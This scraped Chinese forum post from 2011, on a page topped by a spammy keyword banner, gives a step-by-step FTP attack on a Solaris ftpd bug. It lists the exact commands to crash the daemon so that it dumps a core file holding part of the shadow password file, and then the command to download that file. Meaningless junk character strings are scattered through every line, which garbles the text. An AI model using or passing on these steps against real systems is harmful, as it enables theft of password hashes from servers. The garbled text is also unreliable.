天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標題: 如何用FIP獲取shadow口令文件 [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-12 21:01
      
標題: 如何用FIP獲取shadow口令文件
      該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG,使得用戶可以獲得該機的口令文件。具體過程如下:
      
! _4 J( ]( r% i" Z( F0 \: W3 B
      
( I) g+ H" W2 ^" M) n2 u% h! q6 l5 `1.通過 ftp 正常登錄到目的主機上. w$ c4 r3 k3 S, p0 B/ x% \+ w
      
6 z# w# J2 m7 ^
      
2.輸入如下命令序列:2 t. M* O2 Z1 u. s8 @' u+ z; @
      
. e+ P$ q$ a/ W1 v* A
      
ftp> user root wrongpasswd* O- {. `& J: m/ I9 f/ X
      
4 G( j: q7 H$ Y# U
      
ftp> quote pasv/ }8 D* g$ d2 }5 g. _, H$ ~4 _+ B) N8 F
      

      
: S$ V4 n) |7 ^/ V$ H4 v3.這時,ftpd會報錯退出,同時會在當前目錄下生成一個core,口令文件就包含在這個core中。
      
. L: @" q9 I9 H& K$ _1 d6 u+ G+ i2 R: h* b3 a5 Z: ~: U
      
4.再次進入FTP >get core& n0 |$ w: v7 b# Q' I6 X
      
( U1 a$ y- X4 X4 K
      
補充:雖然在core只有一部分shadow,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了; d- B2 j1 v. \/ F
      

      
- ^- r+ r* q$ o$ u, Q. l




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5